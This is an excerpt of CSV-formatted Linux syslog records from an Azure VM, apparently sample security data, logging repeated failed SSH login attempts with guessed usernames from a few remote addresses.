+6025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:48,UbuntuDevEnv,2019-06-26 16:38:48,auth,UbuntuDevEnv,info,Disconnected from invalid user elastic 35.154.19.93 port 39968 [preauth],38623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,35.154.19.9,39968,,
+6026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:16,UbuntuDevEnv,2019-06-26 16:39:16,auth,UbuntuDevEnv,info,Invalid user elastic from 35.154.19.93 port 43270,38729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,35.154.19.9,43270,,
+6027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:16,UbuntuDevEnv,2019-06-26 16:39:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:16,UbuntuDevEnv,2019-06-26 16:39:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:18,UbuntuDevEnv,2019-06-26 16:39:17,auth,UbuntuDevEnv,info,Failed password for invalid user elastic from 35.154.19.93 port 43270 ssh2,38729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,35.154.19.9,43270,,
+6030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:18,UbuntuDevEnv,2019-06-26 16:39:18,auth,UbuntuDevEnv,info,Disconnected from invalid user elastic 35.154.19.93 port 43270 [preauth],38729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,35.154.19.9,43270,,
+6031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:18,UbuntuDevEnv,2019-06-26 16:39:18,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 43270:11: Normal Shutdown, Thank you for playing [preauth]",38729,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,43270,,
+6032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:19,UbuntuDevEnv,2019-06-26 16:39:19,auth,UbuntuDevEnv,info,Invalid user uftp from 171.8.199.77 port 41704,38741,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,171.8.199.7,41704,,
+6033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:19,UbuntuDevEnv,2019-06-26 16:39:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38741,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:19,UbuntuDevEnv,2019-06-26 16:39:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,38741,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:21,UbuntuDevEnv,2019-06-26 16:39:21,auth,UbuntuDevEnv,info,Failed password for invalid user uftp from 171.8.199.77 port 41704 ssh2,38741,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,171.8.199.7,41704,,
+6036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:22,UbuntuDevEnv,2019-06-26 16:39:21,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 41704:11: Bye Bye [preauth],38741,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,41704,,
+6037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:22,UbuntuDevEnv,2019-06-26 16:39:21,auth,UbuntuDevEnv,info,Disconnected from invalid user uftp 171.8.199.77 port 41704 [preauth],38741,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,171.8.199.7,41704,,
+6038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:46,UbuntuDevEnv,2019-06-26 16:39:46,auth,UbuntuDevEnv,info,Invalid user es from 35.154.19.93 port 46582,38840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,es,35.154.19.9,46582,,
+6039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:46,UbuntuDevEnv,2019-06-26 16:39:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:46,UbuntuDevEnv,2019-06-26 16:39:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:48,UbuntuDevEnv,2019-06-26 16:39:47,auth,UbuntuDevEnv,info,Failed password for invalid user es from 35.154.19.93 port 46582 ssh2,38840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,es,35.154.19.9,46582,,
+6042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:48,UbuntuDevEnv,2019-06-26 16:39:48,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 46582:11: Normal Shutdown, Thank you for playing [preauth]",38840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,46582,,
+6043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:48,UbuntuDevEnv,2019-06-26 16:39:48,auth,UbuntuDevEnv,info,Disconnected from invalid user es 35.154.19.93 port 46582 [preauth],38840,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,es,35.154.19.9,46582,,
+6044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:59,UbuntuDevEnv,2019-06-26 16:39:58,auth,UbuntuDevEnv,info,Invalid user roy from 81.0.212.18 port 50298,38892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,81.0.212.1,50298,,
+6045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:59,UbuntuDevEnv,2019-06-26 16:39:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,38892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:39:59,UbuntuDevEnv,2019-06-26 16:39:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:01,UbuntuDevEnv,2019-06-26 16:40:00,auth,UbuntuDevEnv,info,Failed password for invalid user roy from 81.0.212.18 port 50298 ssh2,38892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,81.0.212.1,50298,,
+6048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:01,UbuntuDevEnv,2019-06-26 16:40:00,auth,UbuntuDevEnv,info,Disconnected from invalid user roy 81.0.212.18 port 50298 [preauth],38892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,roy,81.0.212.1,50298,,
+6049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:01,UbuntuDevEnv,2019-06-26 16:40:00,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 50298:11: Bye Bye [preauth],38892,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,50298,,
+6050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:11,UbuntuDevEnv,2019-06-26 16:40:10,auth,UbuntuDevEnv,info,Invalid user es from 35.154.19.93 port 49862,38936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,es,35.154.19.9,49862,,
+6051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:11,UbuntuDevEnv,2019-06-26 16:40:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:11,UbuntuDevEnv,2019-06-26 16:40:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:13,UbuntuDevEnv,2019-06-26 16:40:12,auth,UbuntuDevEnv,info,Failed password for invalid user es from 35.154.19.93 port 49862 ssh2,38936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,es,35.154.19.9,49862,,
+6054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:13,UbuntuDevEnv,2019-06-26 16:40:12,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 49862:11: Normal Shutdown, Thank you for playing [preauth]",38936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,49862,,
+6055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:13,UbuntuDevEnv,2019-06-26 16:40:12,auth,UbuntuDevEnv,info,Disconnected from invalid user es 35.154.19.93 port 49862 [preauth],38936,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,es,35.154.19.9,49862,,
+6056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:18,UbuntuDevEnv,2019-06-26 16:40:17,auth,UbuntuDevEnv,info,Invalid user elasticsearch from 35.154.19.93 port 53136,38961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elasticsearch,35.154.19.9,53136,,
+6057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:18,UbuntuDevEnv,2019-06-26 16:40:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:18,UbuntuDevEnv,2019-06-26 16:40:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:20,UbuntuDevEnv,2019-06-26 16:40:20,auth,UbuntuDevEnv,info,Failed password for invalid user elasticsearch from 35.154.19.93 port 53136 ssh2,38961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elasticsearch,35.154.19.9,53136,,
+6060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:20,UbuntuDevEnv,2019-06-26 16:40:20,auth,UbuntuDevEnv,info,Disconnected from invalid user elasticsearch 35.154.19.93 port 53136 [preauth],38961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elasticsearch,35.154.19.9,53136,,
+6061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:20,UbuntuDevEnv,2019-06-26 16:40:20,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 53136:11: Normal Shutdown, Thank you for playing [preauth]",38961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,53136,,
+6062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:25,UbuntuDevEnv,2019-06-26 16:40:24,auth,UbuntuDevEnv,info,Invalid user elasticsearch from 35.154.19.93 port 56414,38995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elasticsearch,35.154.19.9,56414,,
+6063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:25,UbuntuDevEnv,2019-06-26 16:40:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:25,UbuntuDevEnv,2019-06-26 16:40:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:27,UbuntuDevEnv,2019-06-26 16:40:27,auth,UbuntuDevEnv,info,Failed password for invalid user elasticsearch from 35.154.19.93 port 56414 ssh2,38995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elasticsearch,35.154.19.9,56414,,
+6066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:27,UbuntuDevEnv,2019-06-26 16:40:27,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 56414:11: Normal Shutdown, Thank you for playing [preauth]",38995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56414,,
+6067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:27,UbuntuDevEnv,2019-06-26 16:40:27,auth,UbuntuDevEnv,info,Disconnected from invalid user elasticsearch 35.154.19.93 port 56414 [preauth],38995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elasticsearch,35.154.19.9,56414,,
+6068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:32,UbuntuDevEnv,2019-06-26 16:40:31,auth,UbuntuDevEnv,info,Invalid user esearch from 35.154.19.93 port 59686,39020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esearch,35.154.19.9,59686,,
+6069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:32,UbuntuDevEnv,2019-06-26 16:40:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:32,UbuntuDevEnv,2019-06-26 16:40:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:34,UbuntuDevEnv,2019-06-26 16:40:34,auth,UbuntuDevEnv,info,Failed password for invalid user esearch from 35.154.19.93 port 59686 ssh2,39020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esearch,35.154.19.9,59686,,
+6072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:34,UbuntuDevEnv,2019-06-26 16:40:34,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 59686:11: Normal Shutdown, Thank you for playing [preauth]",39020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,59686,,
+6073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:34,UbuntuDevEnv,2019-06-26 16:40:34,auth,UbuntuDevEnv,info,Disconnected from invalid user esearch 35.154.19.93 port 59686 [preauth],39020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esearch,35.154.19.9,59686,,
+6074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:38,UbuntuDevEnv,2019-06-26 16:40:37,auth,UbuntuDevEnv,info,Invalid user esearch from 35.154.19.93 port 34718,39042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esearch,35.154.19.9,34718,,
+6075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:38,UbuntuDevEnv,2019-06-26 16:40:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:38,UbuntuDevEnv,2019-06-26 16:40:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:40,UbuntuDevEnv,2019-06-26 16:40:39,auth,UbuntuDevEnv,info,Failed password for invalid user esearch from 35.154.19.93 port 34718 ssh2,39042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esearch,35.154.19.9,34718,,
+6078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:40,UbuntuDevEnv,2019-06-26 16:40:39,auth,UbuntuDevEnv,info,Disconnected from invalid user esearch 35.154.19.93 port 34718 [preauth],39042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esearch,35.154.19.9,34718,,
+6079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:40,UbuntuDevEnv,2019-06-26 16:40:39,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 34718:11: Normal Shutdown, Thank you for playing [preauth]",39042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,34718,,
+6080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:45,UbuntuDevEnv,2019-06-26 16:40:45,auth,UbuntuDevEnv,info,Invalid user elsearch from 35.154.19.93 port 38004,39066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elsearch,35.154.19.9,38004,,
+6081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:45,UbuntuDevEnv,2019-06-26 16:40:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:45,UbuntuDevEnv,2019-06-26 16:40:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,39066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:40:48,UbuntuDevEnv,2019-06-26 16:40:47,auth,UbuntuDevEnv,info,Failed password for invalid user elsearch from 35.154.19.93 port 38004 ssh2,39066,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elsearch,35.154.19.9,38004,,
